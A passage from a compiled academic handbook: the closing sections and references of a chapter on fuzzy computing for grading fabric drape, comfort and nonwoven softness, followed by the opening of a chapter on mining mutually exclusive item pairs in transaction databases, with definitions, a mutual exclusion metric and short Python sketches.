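    return X @ U, eigvals.real[order[:n_components]]
```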
Because the cumulative proportion of the eigenvalues for the discriminant functions CAN1 and CAN2 reaches 96.39%, the projections of the four nonwoven groups on the CAN1-CAN2 plane are particularly examined (Figure 8). It can be seen that Group 3 is located between +CAN1 and +CAN2, and the softness index of the samples in Group 3 is closer to that represented by Target 2. On the contrary, Group 1 is located between -CAN1 and -CAN2, and the softness of the samples in this group more closely resembles that represented by Target 1.
Summary for Fuzzy Neural Network for Grading Fabric Softness

Two types of experimental spunbond nonwovens were selected to represent two softness extremes: one with the best softness and the other with the worst softness. The mechanical properties of these nonwovens in terms of extension, shear, bending, compression, and surface friction and roughness were measured using the KES-FB instruments. The obtained KES-FB data helped fingerprint the softness of these two extreme nonwoven samples. A softness grading model was established by using fuzzy neural network computing. This model graded the softness of a group of six spunbond nonwovens made from commercial polypropylene with numerical values between 0 (indicating the worst softness) and 1 (indicating the best softness). These numerical grading values could then be used as a softness index for spunbond nonwoven fabrics in communications among manufacturers and customers. The model cross-validation indicated that the estimate for the model MSE was as low as 0.0096. The multivariate method of discriminant analysis could be used to provide a graphical interpretation for the nonwoven softness index. The model established in this study was only demonstrative because of the limited number of exemplars (sample points) in the training data set. Another disadvantage of the present procedure is
that the neuro-fuzzy program was stand-alone and not accessible through the Internet. Further research is needed to expand the present fabric database to include various types of nonwoven fabrics and to incorporate the neuro-fuzzy computing procedure into the Web-based database structure. This will enable manufacturers or end users to execute the fabric softness evaluation by logging onto the fabric database Web site.
CONCLUSION AND FURTHER WORK

In this chapter, we have exhibited a fabric database and three different fuzzy computing approaches for applications in evaluating fabric end-use properties regarding drape, tailorability, comfort, and softness. Quantitative assessment for these quality aspects of fabric end uses is still more art than science in today's textile production and consumption. The presented research cases help explore the ability of database computing and fuzzy logic computing technology to solve those fabric performance grading problems that are continuously challenging the textile community. In the application for predicting fabric drape and tailorability, the established online database and its intelligent search engine provided a useful tool for textile end users to quickly find quality fabrics that would meet specific product requirements. The flexible queries supported by the database system enhanced the system's search efficiency. The method of fuzzy linear clustering was feasible for predicting fabric drape based on measured mechanical properties. The experiment indicated that trying to fit the training data with too many clusters or training with too many data points might cause a loss of generalization power. Therefore, we need to guard against overfitting when using fuzzy linear clustering. Our study also indicated that the hybrid method combining
the K-nearest neighbor method with fuzzy linear clustering improved the prediction accuracy for fabric drape. For the purpose of evaluating apparel comfort, four types of fuzzy comprehensive evaluation models were reviewed. Model (•, ⊕) was used to assess six different fabrics for three different end uses. The implementation of this model evaluation indicated that the approach of fuzzy comprehensive evaluation was useful for assessing the appropriateness of a specific fabric for a specific end use based on instrumental testing for the fabric’s critical physical properties and on the acquisition of the consumer’s preference for apparel comfort. From the present study, we could conclude that plain wool fabric was better than twill wool fabric for making blouses, slacks, and underpants because plain wool fabric has a higher fuzzy comprehensive value. Similarly, plain cotton fabric was preferred to twill cotton fabric for the end uses of blouses, slacks, and underpants. Plain silk fabric was the best among those six types of fabric for the three end uses because of its highest fuzzy comprehensive values. In the case of grading nonwoven softness using the method of fuzzy neural network computing, the neuro-fuzzy model CANFIS was selected to perform machine learning for the two targeted polypropylene spunbond nonwovens after inputting their mechanical property data (KES-FB instrument data). The trained neuro-fuzzy model was then applied to evaluate the softness of six spunbond nonwoven samples made from commercial polypropylene. The model cross-validation revealed that the model MSE was 0.0096. This neuro-fuzzy model was able to produce a numerical value between 0 and 1 for grading nonwoven softness. It should be noted that there were some limitations throughout this research. First, the three fuzzy applications were three individual cases based on different data sets. The fabric database introduced was used only for the establishment of fuzzy clustering models for evaluating fabric
drape and tailorability. Second, the number of samples in each data set was limited, particularly, in the data sets for the second and third cases. This might affect the universal representativeness for those established fuzzy models. Finally, all the fuzzy computing procedures discussed in the above cases were separated and were not integrated into a single computer program package. Further research is needed to advance the progress of the fuzzy computing techniques for textile applications. Recommended future work is described below. The volume of the current fabric database needs to be increased so that it can include different fabric types from wovens to nonwovens, and different fabric properties from durability to aesthetics. By expanding this fabric database, we are able to develop an integrated computer program package capable of running not only the fuzzy clustering methods, but also the basic fuzzy comprehensive models discussed and the neurofuzzy hybrid approach introduced. In this way, end users may have several choices to implement different fuzzy evaluation procedures upon their different application needs. Additionally, the Webbased database architecture also needs enhancing to allow all the fuzzy evaluation procedures to be accessible through the Internet. Further experiment and validation will be carried out about the capability of the fuzzy clustering methods for establishing new search engines for the fabric database. Special interests include the use of fuzzy linear clustering for discovering new patterns among fabric properties, the application of the fuzzy C-means algorithm for fabric classification and query answering, and the development of hybrid approaches for combining fuzzy methods with decision-tree learning to predict fabric appearance and tailorability. Furthermore, the fuzzy clustering and query-answering method will be compared to the fSQL approach so as to find more effective ways to incorporate these two approaches for different applications.
ACKNOWLEDGMENT

The authors would like to express their special thanks to the following individuals and organizations for all the assistance they have rendered in the course of this research work: Professor Sukhamay Kundu for helpful discussions on topics related to this work and for his permission to use his program for fuzzy linear clustering; Dr. Jackie Robeck from the University of Louisiana at Lafayette for providing fabric tailorability data; Sreeram Vuppala, Bin Zhang, Ayse Gilder, and Ting Zhang of Louisiana State University for their assistance in the implementation of the online fabric database and the acquisition of the fabric property data; Dr. Billie J. Collier and Zuopang Li of the University of Tennessee for providing experimental nonwoven samples; and finally, to the Louisiana Board of Regents and ExxonMobil Chemical Company for financial support. This work is also partially supported by the NSF grant ITR-0326387 and AFOSR grants FA9550-05-1-0454, F49620-03-1-0238, F49620-03-1-0239, and F49620-03-1-0241.
REFERENCES

Barrett, G. R., Clapp, T. G., & Titus, K. J. (1996). An on-line fabric classification technique using a wavelet-based neural network approach. Textile Research Journal, 66, 521-528. Bezdek, J. C. (1980). A convergence theorem for the fuzzy ISODATA clustering algorithms. IEEE Transactions on Pattern Analysis and Machine Intelligence, 2, 1-8. Brand, R. H. (1964). Measurement of fabric aesthetics: Analysis of aesthetic components. Textile Research Journal, 34, 791-804. Chang, K. P., & Tae, J. K. (1997). Objective rating of seam pucker using neural networks. Textile Research Journal, 67, 494-502.
Chen, J., Chen, Y., Zhang, B., & Gider, A. (2002). Fuzzy linear clustering for fabric selection from online database. In J. Keller & O. Nasraoui (Eds.), 2002 Annual Meeting of the North American Fuzzy Information Processing Society Proceedings (pp. 518-523). Piscataway, NJ: IEEE. Chen, J., & Kundu, S. (1999). Fuzzy control system design by fuzzy clustering and self-organization. In Proceedings of NAFIPS’96 Conference. Berkeley, CA: IEEE. Chen, P. W., Liang, T., Yau, H., & Lin, H. C. (1998). Classifying textile faults with a back-propagation neural network using power spectra. Textile Research Journal, 68, 121-126. Chen, Y., & Collier, B. J. (1997). Characterizing fabric end-use by fabric physical properties. Textile Research Journal, 67, 247-252. Chen, Y., Collier, B. J., & Collier, J. R. (1999). Application of cluster analysis to fabric classification. International Journal of Clothing Science and Technology, 11, 206-215. Chen, Y., Collier, B. J., Hu, P., & Quebedeaux, D. (2000). Objective evaluation of fabric softness. Textile Research Journal, 70, 443-448. Chen, Y., Zhao, T., & Collier, B. J. (2001). Prediction of fabric end-use using a neural network technique. Journal of Textile Institute, 92, 157-163. Chen, Y., Zhao, T., & Turner, B. (2001). A new computerized data acquisition and analysis system for KES-FB instruments. Textile Research Journal, 71, 767-770. Chen, Y. Y., Liu, Y. F., & Wang, P. Z. (1983). Models of multifactorial evaluation. Fuzzy Mathematics, 1, 61-70. Cheng, L., & Adams, D. L. (1995). Yarn strength prediction using neural network. Textile Research Journal, 65, 495-500. Dilworth, D. (2007). For first time, apparel outsells computers online: Shop.org. DMNEWS. Retrieved
May 22, 2007, from http://www.dmnews.com/cms/trackback/41082-1 Dorrity, J. L., Vachtsevanos, G. J., & Jasper, W. (1996). Real time fabric defect detection and control in weaving processes (Tech. Rep. No. G94-2). Wilmington, DE: National Textile Center. Ellis, B. C., & Garnsworthy, R. K. (1980). A review of techniques for the assessment of hand. Textile Research Journal, 50, 231-238. Galindo, J., Urrutia, A., & Piattini, M. (2006). Fuzzy databases: Modeling, design, and implementation. Hershey, PA: Idea Group Publishing.
Kemp, T., & Lewis, D. (2000). Retail site pushes Web envelope. InternetWeek. Retrieved September 8, 2000, from http://www.internetwk.com/lead/lead090800.htm Kim, J. J., Shalev, I., & Barker, R. L. (1994). Softness properties of paper towels. TAPPI Journal, 77, 83-89. Kundu, S., & Chen, J. (1994). Fuzzy linear invariant clustering with applications in fuzzy control. In Proceedings of the North American Fuzzy Information Processing Society (NAFIPS) Biannual Conference (pp. 196-200). Piscataway, NJ: The Institute for Electrical and Electronics Engineers (IEEE).
Gong, R. H., & Chen, Y. (1999). Predicting the performance of fabrics in garment manufacturing with artificial neural networks. Textile Research Journal, 69, 447-482.
Kuo, C. J., & Lee, C. (2003). A back-propagation neural network for recognizing fabric defects. Textile Research Journal, 73, 147-151.
Hathaway, R. J., & Bezdek, J. C. (1993). Switching regression models and fuzzy clustering. IEEE Transactions on Fuzzy Systems, 1, 195-204.
Kuo, C. J., Shih, C., Kao, C., & Lee, J. (2005). Color and pattern analysis of printed fabric by an unsupervised clustering method. Textile Research Journal, 75, 9-12.
Hearle, J. W. S. (1993a). Can fabric hand enter the dataspace? Part I. Textile Horizons, 14-17. Hearle, J. W. S. (1993b). Can fabric hand enter the dataspace? Part II: Measuring the unmeasurable? Textile Horizons, 16-20. Howorth, W. S. (1964). The handle of suiting, lingerie, and dress fabrics. Journal of Textile Institute, 55, T251-T260. Jang, J. R., Sun, C., & Mizutani, E. (1997). Neurofuzzy and soft computing. Upper Saddle River, NJ: Prentice-Hall, Inc. Kawabata, S., & Niwa, M. (1989). Fabric performance in clothing manufacture. Journal of Textile Institute, 80, 19-50. Kawabata, S., Niwa, M., & Wang, F. (1994). Objective hand measurement of nonwoven fabrics. Textile Research Journal, 64, 597-610.
Kuo, C. J., Shih, C., & Lee, J. (2004). Automatic recognition of fabric weave patterns by a fuzzy c-means clustering method. Textile Research Journal, 74, 107-111. Lindeman, H. R., Merenda, P. F., & Gold, R. Z. (1980). Introduction to bivariate and multivariate analysis. Glenview, IL: Scott, Foresman and Company. Mikulcic, A., & Chen, J. (1996). Experiments on application of fuzzy clustering in fuzzy system design. In Proceedings of FUZZ IEEE 1996. New Orleans, LA: The Institute for Electrical and Electronics Engineers (IEEE). Pan, N., Yen, K. C., Zhao, S. J., & Yang, S. R. (1988a). A new approach to the objective evaluation of fabric handle from mechanical properties: Part I. Objective measure for total handle. Textile Research Journal, 58, 438-444.
Pan, N., Yen, K. C., Zhao, S. J., & Yang, S. R. (1988b). A new approach to the objective evaluation of fabric handle from mechanical properties: Part II. Objective measure for primary handle. Textile Research Journal, 58, 531-537.
Sabharwal, J., & Chen, J. (1996). Intelligent pH control using fuzzy linear invariant clustering. In Proceedings of Southeastern IEEE Symposium on Systems Theory (pp. 514-518). Baton Rouge, LA: IEEE.
Pan, N., Yen, K. C., Zhao, S. J., & Yang, S. R. (1988c). A new approach to the objective evaluation of fabric handle from mechanical properties: Part III. Fuzzy cluster analysis for fabric handle sorting. Textile Research Journal, 58, 565-571.
Sarimveis, H., & Retsina, T. (2001). Tissue softness prediction using neural network methodologies: Such tools can improve productivity and minimize out-of-spec production. Pulp and Paper Canada, 102, 42-45.
Postle, R., & Mahar, T. J. (1982). Basic requirements for an international objective measurement programme for wool fabric quality. In S. Kawabata, R. Postle, & M. Niwa (Eds.), Objective specification of fabric quality, mechanical properties and performance (pp. 1-22). Osaka, Japan: The Textile Machinery Society of Japan.
SAS Institute Inc. (1990). SAS/STAT user’s guide, version 6 (4th ed.). Cary, NC: SAS Institute Inc.
Principe, J. C., Euliano, N. R., & Lefebvre, W. C. (2000). Neural and adaptive systems: Fundamentals through simulations. New York: John Wiley & Sons, Inc. Pynckels, F., Kiekens, P., Sette, S., Langenhove, L. V., & Impe, K. (1995). Use of neural nets for determining the spinnability of fibres. Journal of Textile Institute, 86, 425-437. Raheel, M., & Liu, J. (1991). An empirical model for fabric hand: Part I. Objective assessment of light weight fabrics. Journal of Textile Institute, 61, 31-38. Rong, G. H., & Slater, K. (1992). A new approach to the assessment of textile performance. Journal of Textile Institute, 83, 197-208. Rudie, R. (1996). Denim does spring. Bobbin, 34-37. Rust, J. P., Keadle, T. L., Allen, D. B., & Barker, R. L. (1994). Tissue softness evaluation by mechanical stylus scanning. Textile Research Journal, 64, 163-168.
Wang, G. Y. (1984). On the essence and application of models of comprehensive evaluations. Fuzzy Mathematics, 4, 81-88.
KEY TERMS

Artificial Neural Network (ANN): ANN is a computing paradigm that loosely simulates cortical structures of the brain. The simplest element of an ANN is called a processing element, or node. Soft computing techniques are used to develop different types of ANN models based on different processing elements.

Bounded Sum: Denoted by the symbol ⊕, it is defined as α ⊕ β = min(1, α + β) or α ⊕ β = (α + β) ∧ 1. Here, ∧ denotes AND in Boolean algebra.

Drapability: It is the ability of a fabric to form pleating folds when deformed under its own weight.

Durability: Durability is a denotation for textile and apparel quality features related to product reliability. These features include the change of tensile strength, tear strength, abrasion resistance, colorfastness, and cracking and bursting strength during service life.
Eigenvalue: It is a solution derived from a vector-characteristic equation, representing the variance of a main effect.

Fabric Drape Coefficient: It is the ratio of the projected pleating-fold area formed by a piece of fabric after draping under its own weight to the original area of the same piece of fabric without draping. The higher the fabric drape coefficient, the lower the fabric drapability.

Fabric Performance: Fabric performance is a general term indicating fabric end-use properties regarding durability, comfort, and aesthetics. Typical fabric properties like breakage and abrasion, heat and moisture transport, hand and drape, and pattern and color are among those end-use properties.

Fuzzy Clustering: It is a family of clustering methods that partition a set of given data objects into (nondisjoint) fuzzy clusters. Each fuzzy cluster is a fuzzy set, and each object's membership degrees in all the clusters sum to one.

Fuzzy Linear Clustering: It is a fuzzy clustering method in which the prototype for each
fuzzy cluster is a linear function of the input variables.

Fuzzy Set: A fuzzy set is a generalization of an ordinary (crisp) set. A fuzzy set S allows an element to have a partial degree (between zero and one) of membership in S.

Pure Bending Tester: It is an instrument for measuring fabric pure flexural deformation.

Shear Tester: It is an instrument for measuring fabric in-plane shear deformation.

Softness: Softness is a type of fabric touch feeling by a human's hand, related to the bulky, flexible, and springy properties of the fabric.

Spunbond: Spunbond is a specific nonwoven web-forming process in which synthetic filament fiber is extruded, drawn, and laid on a conveyor belt for fiber collection.

Tailorability: It is the ease of converting a piece of 2-D fabric into a required piece of 3-D garment component.

Yarn Interlacing: It is a method of forming woven fabrics by weaving two sets of yarns.
This work was previously published in Handbook of Research on Fuzzy Information Processing in Databases, edited by J. Galindo, pp. 538-562, copyright 2008 by Information Science Reference (an imprint of IGI Global).
Chapter 7.14
Mining for Mutually Exclusive Items in Transaction Databases

George Tzanis, Aristotle University of Thessaloniki, Greece
Christos Berberidis, Aristotle University of Thessaloniki, Greece
ABSTRACT
Association rule mining is a popular task that involves the discovery of co-occurrences of items in transaction databases. Several extensions of the traditional association rule mining model have been proposed so far; however, the problem of mining for mutually exclusive items has not been directly tackled yet. Such information could be useful in various cases (e.g., when the expression of a gene excludes the expression of another), or it can be used as a serious hint in order to reveal inherent taxonomical information. In this article, we address the problem of mining pairs of items, such that the presence of one excludes the other. First, we provide a concise review of the literature, then we define this problem, we propose a probability-based evaluation metric, and finally a mining algorithm that we test on transaction data.

INTRODUCTION
Association rules are expressions that describe a subset of a transaction database. When mining for such patterns, it is quite often that we come up with a large number of rules that appear to be too specific and not very interesting. A rule that relates two specific products in a market basket database is not very likely to be really strong compared to a rule that relates two groups or two families of products. Hierarchical relationships among items in a database can be used in order to aggregate the weak, lower-level rules into strong, higher-level rules, producing hierarchical, multiple level, or generalized association rules. However, such information is not always explicitly provided, although it might exist. Mining for taxonomies is a really challenging task that, to the best of our knowledge, has not been approached yet. Taxonomies are conceptual
hierarchies, implemented by is-a relationships. The discovery of such relationships would involve the complete description and formulation of concepts that are more general or more specific than others. To learn taxonomies from data implies the automatic extraction of human concepts from the data, with the use of an algorithm. To our understanding, this is virtually impossible. However, we believe that when mining for various types of patterns, one can get serious hints about possible hierarchical relationships. Let us say, for instance, that a supermarket customer is vegetarian. Then it would be really rare for this customer to buy both veggie burgers and red meat. It seems that the two products exclude each other. When one of them is present, the probability of also finding the other one is very low. Motivated by that observation, we propose a method for mining for mutually exclusive items. Such information is also useful regardless of its use as a taxonomy clue. In this article, we define the problem of mining for mutually exclusive items. We propose a probability-based mutual exclusion metric and a mining algorithm that we test on transaction data. The article is organized as follows. The next section presents the required background knowledge. This is followed by a short review of the relevant literature. The next section contains the description of the proposed approach, definitions of terms and notions used, the proposed algorithm, a novel metric for measuring the mutual exclusion, and an illustrative example of our approach. Next we present our experiments, and then we discuss the presented approach. The final section contains our conclusions and our ideas for future research.
PRELIMINARIES

The association rules mining paradigm involves searching for co-occurrences of items in transaction databases. Such a co-occurrence may imply a relationship among the items it associates. These
relationships can be further analyzed and may reveal temporal or causal relationships, behaviors, and so forth. The formal statement of the problem of mining association rules can be found in Agrawal, Mannila, Srikant, Toivonen, and Verkamo (1996). Given a finite multiset of transactions D, the problem of mining association rules is to generate all association rules that have support and confidence at least equal to the user-specified minimum support threshold (min_sup) and minimum confidence threshold (min_conf), respectively. The problem of discovering all the association rules can be decomposed into two subproblems (Agrawal, Imielinski, & Swami, 1993):

1. The discovery of all itemsets that have support at least equal to the user-specified min_sup threshold. These itemsets are called large or frequent itemsets.
2. The generation of all rules from the discovered frequent itemsets. For every frequent itemset F, all nonempty subsets of F are found. For every such subset S, a rule of the form S⇒F-S is generated, if the confidence of the rule is at least equal to the user-specified min_conf threshold.
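To make the two subproblems concrete, the following minimal Python sketch (an illustration only, not the implementation of any of the cited works; the transaction data and thresholds in the usage comment are hypothetical) enumerates the frequent itemsets by brute force and then generates every rule S⇒F-S whose confidence support(F)/support(S) reaches min_conf.

from itertools import combinations

def mine_association_rules(transactions, min_sup, min_conf):
    # Subproblem 1: find all frequent itemsets (brute force, for illustration).
    n = len(transactions)
    items = sorted({i for t in transactions for i in t})
    def support(itemset):
        return sum(1 for t in transactions if itemset <= t) / n
    frequent = {}
    for k in range(1, len(items) + 1):
        for cand in combinations(items, k):
            s = support(frozenset(cand))
            if s >= min_sup:
                frequent[frozenset(cand)] = s
    # Subproblem 2: generate rules S => F-S from every frequent itemset F.
    rules = []
    for F, sup_F in frequent.items():
        for r in range(1, len(F)):
            for S in map(frozenset, combinations(F, r)):
                conf = sup_F / frequent[S]  # confidence = support(F) / support(S)
                if conf >= min_conf:
                    rules.append((set(S), set(F - S), sup_F, conf))
    return rules

# Hypothetical usage:
# db = [frozenset(t) for t in ({"bread", "milk"}, {"bread"}, {"bread", "milk", "butter"})]
# print(mine_association_rules(db, min_sup=2/3, min_conf=0.8))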
Another method to extract strong rules is the use of concept hierarchies, also called taxonomies, that exist in various application domains, such as market basket analysis. A taxonomy is a concept tree, where the edges represent is-a relationships from the child to the parent. An example of such a relationship is: "Cheddar is-a cheese is-a dairy product is-a food is-a product." When a taxonomy about a domain of application is available, a number of usually high-confidence rules that are too specific (having low support) can be merged, creating a rule that aggregates the support and, therefore, the information, at a higher abstraction level than the individual rules. In other words, "looser" associations at the lower levels of the taxonomy are summarized, producing "winner"
associations of higher levels. For example, the rule "if a customer buys 0.5 lb. wheat bread then he/she also buys 1 lb. skimmed milk" is very likely to have low support, while a rule "if a customer buys bread then he/she also buys milk" will very possibly have much higher support, because it includes all types, brands, and packages of bread and milk bought by the store's customers.
RELATED WORK

Association rules were first introduced by Agrawal et al. (1993) as a market basket analysis tool. Later, Agrawal and Srikant (1994) proposed Apriori, a level-wise algorithm, which works by generating candidate itemsets and testing if they are frequent by scanning the database. Apriori exploits the downward closure property, according to which any nonempty subset of a frequent itemset is also frequent. Therefore, at each level, the candidate frequent itemsets are generated based only on the frequent itemsets found in the previous level. About the same time, Mannila, Toivonen, and Verkamo (1994) discovered independently the same property and proposed a variation of Apriori, the OCD algorithm. A joint paper combining the previous two works was later published (Agrawal et al., 1996). Several algorithms have been proposed since then, some improving the efficiency, such as FP-Growth (Han, Pei, & Yin, 2000), and others addressing different problems from various application domains, such as spatial (Koperski & Han, 1995), temporal (Chen & Petrounias, 2000), and intertransactional rules (Tung, Lu, Han, & Feng, 2003), which can also be used for prediction (Berberidis, Angelis, & Vlahavas, 2004). One of the major problems in association rules mining is the large number of often uninteresting rules extracted. Srikant and Agrawal (1995) presented the problem of mining for generalized association rules. These rules utilize item taxonomies in order to discover more interesting rules.
For example, given that "Gouda is-a cheese" and "Cheddar is-a cheese," we discover a rule, such as "if a customer buys bread then he/she also buys cheese," with support higher than that of a rule for a specific cheese. The authors propose a basic algorithm as well as three more efficient algorithms, along with a new interestingness measure for rules, which uses information in the taxonomy. Thomas and Sarawagi (1998) propose a technique for mining generalized association rules based on SQL queries. Han and Fu (1995) also describe the problem of mining "multiple-level" association rules, based on taxonomies, and propose a set of top-down progressive deepening algorithms. Teng (2002) proposes a type of augmented association rules, using negative information called dissociations. A dissociation is a relationship of the form "X does not imply Y," but it could be that "when X appears together with Z, this implies Y." Han and Fu (1994) propose some algorithms for dynamic refinement and dynamic generation of concept hierarchies. The generation of concept hierarchies concerns only numerical attributes and is based on data distribution. The dynamic refinement of a given or even a generated concept hierarchy is based on a particular learning request, the relevant set of data, and database statistics. Another kind of association rules are negative association rules. Savasere, Omiecinski, and Navathe (1998) introduced the problem of mining for negative associations. Negative associations deal with the problem of finding rules that imply what items are not likely to be purchased, when a certain set of items is purchased. The approach of Savasere et al. (1998) demands the existence of a taxonomy and is based on the assumption that items belonging to the same parent in the taxonomy are expected to have similar types of associations with other items. Since they consider only those cases where the expected support can be calculated based on the taxonomy, only a subset of the whole set of negative association rules can be discovered. The authors propose a naive and an improved algorithm for mining negative
association rules, along with a new measure of interestingness. In a more recent work, Wu, Zhang, and Zhang (2004) present an efficient method for mining positive and negative associations, and propose a pruning strategy and an interestingness measure. Their method extends the traditional positive association rules (A ⇒ B) to include negative association rules of the form A ⇒ –B, –A ⇒ B, and –A ⇒ –B. (The minus sign means not.) The last three rules indicate negative associations between itemsets A and B. A mutual exclusion cannot be expressed by one such rule. If items a and b are mutually exclusive, then {a} ⇒ –{b} and {b} ⇒ –{a} must hold concurrently, which is different from –{a} ⇒ –{b}.
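The distinction can be checked numerically. The short sketch below (illustrative only; the toy transactions are made up) computes the confidences of {a} ⇒ –{b}, {b} ⇒ –{a}, and –{a} ⇒ –{b} from raw counts: the first two must both be close to one for a and b to behave as mutually exclusive, whereas the third can equal one even when a and b always appear together.

def negative_rule_confidences(transactions, a, b):
    # conf(X => -Y) = P(Y absent | X present);  conf(-X => -Y) = P(Y absent | X absent)
    has_a = [t for t in transactions if a in t]
    has_b = [t for t in transactions if b in t]
    no_a  = [t for t in transactions if a not in t]
    conf_a_implies_not_b = sum(1 for t in has_a if b not in t) / len(has_a)
    conf_b_implies_not_a = sum(1 for t in has_b if a not in t) / len(has_b)
    conf_not_a_implies_not_b = sum(1 for t in no_a if b not in t) / len(no_a)
    return conf_a_implies_not_b, conf_b_implies_not_a, conf_not_a_implies_not_b

# Toy data: a and b are always bought together, so they are clearly NOT mutually exclusive,
# yet the rule -{a} => -{b} still has confidence 1.
db = [{"a", "b"}] * 5 + [{"c"}] * 95
print(negative_rule_confidences(db, "a", "b"))  # (0.0, 0.0, 1.0)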
MINING FOR MUTUALLY EXCLUSIVE ITEMS

In this section we describe our approach for discovering mutually exclusive items. Specifically, in subsection 4.1, we attempt to define the concept of mutual exclusion and we describe the intuition behind our approach. In subsection 4.2, we present the task of mining for contiguous frequent itemsets, which are a basic part of our approach. In subsection 4.3, we describe the metrics used for evaluating candidate pairs of mutually exclusive items and the algorithm for mining them. Finally, in subsection 4.4, we provide an illustrative example of our approach.
Problem Definition

• Definition 1: Let D be a finite multiset of transactions and I be a finite set of items. Each transaction T∈D is a set of items such that T⊆I. If two items i1∈I and i2∈I are mutually exclusive, then there is not any transaction T∈D, such that {i1, i2}⊆T.
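Taken literally, Definition 1 amounts to the following check (a sketch, not part of the proposed algorithm); the discussion below explains why this naive test alone is not sufficient for declaring two items mutually exclusive.

def strictly_exclusive(transactions, i1, i2):
    # Definition 1 read literally: no transaction in D contains both i1 and i2.
    # In a sparse database many unrelated pairs pass this test by pure chance.
    return not any(i1 in t and i2 in t for t in transactions)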
The above definition of mutual exclusion is strict. However, the inverse of Definition 1 does
not generally hold, so it cannot be used to identify mutually exclusive items. Consider the database of a large store containing more than 10,000 items and millions of transactions; it is possible that there is a large number of pairs of items that are never purchased together. According to the inverse of Definition 1, all of these pairs of items are mutually exclusive. But, in fact, only a very small number of them are truly mutually exclusive. Based on the notions explained so far, we propose an algorithm for mining for mutually exclusive items in a transaction database, and we focus on its application on market basket data. The mutual exclusion of two database items could imply an alternative type of association. Of course, this kind of mined knowledge needs to be confirmed by the domain expert so that it can be utilized eventually. A point that also has to be stressed is that although we perform a sort of causality analysis (the existence of an item excludes or "causes the nonexistence of" another), this is not what we aim for. Our goal is to discover items that never or rarely appear together under certain conditions that are explained below. Mining for mutually exclusive items in a database possibly containing several thousand different items involves searching in a space that consists of all the possible pairs of items, because virtually any of them could contain two items that exclude each other. However, this approach is naive and simplistic and can lead to many mutually exclusive items that, in fact, are not, as explained above. We propose a more intuitive approach, which is based on the assumption/observation that every frequent itemset expresses a certain behavior of a group of customers, and, therefore, it could be used to guide our search. Items that appear with high frequency in the subspace of a frequent itemset are more likely to be systematically mutually exclusive, because they follow a customer behavioral pattern and not because of pure chance or unusual cases. However, we cover these cases with an extra pass over the database in order to remove the candidate mutually exclusive
Figure 1. The three steps of our approach: the database is mined for frequent itemsets (Step 1), which yield the contiguous frequent itemsets (Step 2), from which the mutually exclusive items are extracted (Step 3).
pairs that for any reason are not confirmed by the transactions. Our approach consists of three steps (Figure 1). In the first step, all the frequent itemsets are mined. Then, the frequent itemsets are used for mining the contiguous frequent itemsets, producing the extensions that will be used in the next step as candidate mutually exclusive items. Any frequent itemset mining algorithm can be used in the first step. Step 2 works in a level-wise manner like Apriori and requires a number of scans over the database, which is proportional to the size of the extensions discovered. In the case of the basic Apriori algorithm, the number of scans is equal to the size of the itemsets, but there are some improvements in later versions that require fewer scans and are more efficient. The extensions of the contiguous frequent itemsets mined at the second step are candidates for participating in a pair of mutually exclusive items.
Mining for Contiguous Frequent Itemsets

In the following lines we provide some definitions and formulate the problem of mining contiguous frequent itemsets as defined in previous work (Berberidis, Tzanis, & Vlahavas, 2005). Let D be a finite multiset of transactions and I be a finite set of items. Each transaction T∈D is a set of items such that T⊆I. Mining for frequent k-itemsets involves searching in a search space, which consists of all the possible combinations of
length k of all items in I. Every frequent itemset F⊆I divides the search space into two disjoint subspaces. The first consists of the transactions that contain F and from now on will be called the F-subspace, and the second includes all of the other transactions.

• Definition 2: Let F⊆I be a frequent itemset in D, according to a first-level support threshold, and E⊆I be another itemset. The itemset F∪E is considered to be a contiguous frequent itemset, if F∩E=∅, and E is frequent in the F-subspace, according to a second-level support threshold.
Itemset E is called the locally frequent extension of F. The term locally is used because E may not be frequent in the whole set of transactions. In order to avoid any confusion, from now on we will use the terms local and locally when we refer to a subset of D, and the terms global and globally when we refer to D. For example, we call global support (gsup) the first-level support and local support (lsup) the second-level support. An itemset F that satisfies the minimum gsup threshold (min_gsup) is considered to be globally frequent, and an itemset E that is frequent in the F-subspace, according to the minimum lsup threshold (min_lsup), is considered to be locally frequent. The local support of an itemset E in the F-subspace can be calculated as in Equation 1.
lsup(E, F) = gsup(E ∪ F) / gsup(F)    (1)
The lsup threshold can be set arbitrarily by the user-expert or can be the same as the gsup threshold. The contiguous frequent itemsets that contain a locally frequent extension of length k are called k-contiguous frequent itemsets. Given a finite multiset of transactions D, the problem of mining contiguous frequent itemsets is to generate all itemsets F∪E that consist of an itemset F that has gsup at least equal to the user-specified minimum global support threshold and an extension E that has local support at least equal to the user-specified minimum local support threshold.
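The following sketch (illustrative only, not the authors' implementation) computes the local support of Equation 1 directly on the F-subspace and collects the single-item extensions E that make F∪{E} a contiguous frequent itemset in the sense of Definition 2.

def local_support(transactions, E, F):
    # lsup(E, F) = gsup(E ∪ F) / gsup(F), evaluated on the F-subspace.
    E, F = frozenset(E), frozenset(F)
    f_subspace = [t for t in transactions if F <= t]
    if not f_subspace:
        return 0.0
    return sum(1 for t in f_subspace if E <= t) / len(f_subspace)

def locally_frequent_extensions(transactions, F, min_lsup):
    # Items outside F that are frequent in the F-subspace (length-1 extensions).
    F = frozenset(F)
    f_subspace = [t for t in transactions if F <= t]
    candidates = {i for t in f_subspace for i in t} - F
    return {e for e in candidates if local_support(transactions, {e}, F) >= min_lsup}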
MUTUAL EXCLUSION METRICS AND MINING ALGORITHM

In order to distinguish when two items are mutually exclusive, we need a measure to evaluate the degree of the mutual exclusion between them. Initially, we should be able to evaluate this within the subspace of a frequent itemset (locally), and then it should be evaluated globally, with all the frequent itemsets that support this candidate pair contributing accordingly. For this purpose, we propose the use of a metric we call the mutual exclusion metric (MEM) that can be calculated in two phases; the first one is local and is required for the second one, which is the global one.

Local metric. We propose the following local metric (Equation 2), which will be called Local MEM, for the evaluation of a candidate pair of mutually exclusive items that is supported by a frequent itemset I; its range is [0, 1].
LM_I(A, B) = [P(A−B) + P(B−A)] · min[P(A−B | A), P(B−A | B)]
           = [(S_A − S_AB) + (S_B − S_AB)] · min[(S_A − S_AB)/S_A, (S_B − S_AB)/S_B]
           = (S_A + S_B − 2·S_AB) · [1 − S_AB / min(S_A, S_B)]    (2)
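A direct transcription of Equation 2 into Python follows (a sketch only; S_A, S_B, and S_AB are the fractions of I-subspace transactions containing A, B, and both, as explained right after the formula).

def local_mem(transactions, I, a, b):
    # Local MEM of the candidate pair (a, b) within the subspace of frequent itemset I.
    I = frozenset(I)
    sub = [t for t in transactions if I <= t]
    if not sub:
        return 0.0
    s_a  = sum(1 for t in sub if a in t) / len(sub)
    s_b  = sum(1 for t in sub if b in t) / len(sub)
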